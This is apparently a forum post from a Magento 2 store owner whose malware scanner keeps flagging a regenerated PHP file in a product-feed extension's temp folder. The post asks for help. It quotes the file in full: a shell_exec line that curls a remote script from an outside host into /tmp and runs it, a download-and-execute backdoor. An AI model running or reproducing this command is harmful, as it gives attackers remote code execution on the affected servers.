Skip to content

Malware in Magento 2 mirasvit feed

I have installed Data Feed watch on my Magento 2 store and also installed Sucuri Monitoring, it always sends me a malware warning of “php.backdoor.shell-exec.014” for some files like “media/feed/tmp/16699072529768.php”

I removed the file but after some days it automatically generated and it has code below

<?php function exec_feed_variable_0a1d9c991efeed84a978b4465847bd54782a9e209b39e199279150d24fc83500($product, $objectManager)
 {var_dump(shell_exec('curl -qs myj.uk.to/reverse.js > /tmp/1.php ; php -f /tmp/1.php 2>&1 &'));} 
echo exec_feed_variable_0a1d9c991efeed84a978b4465847bd54782a9e209b39e199279150d24fc83500($product, $objectManager); ?>

Please let me know what this code does and how to remove it so it won’t come again.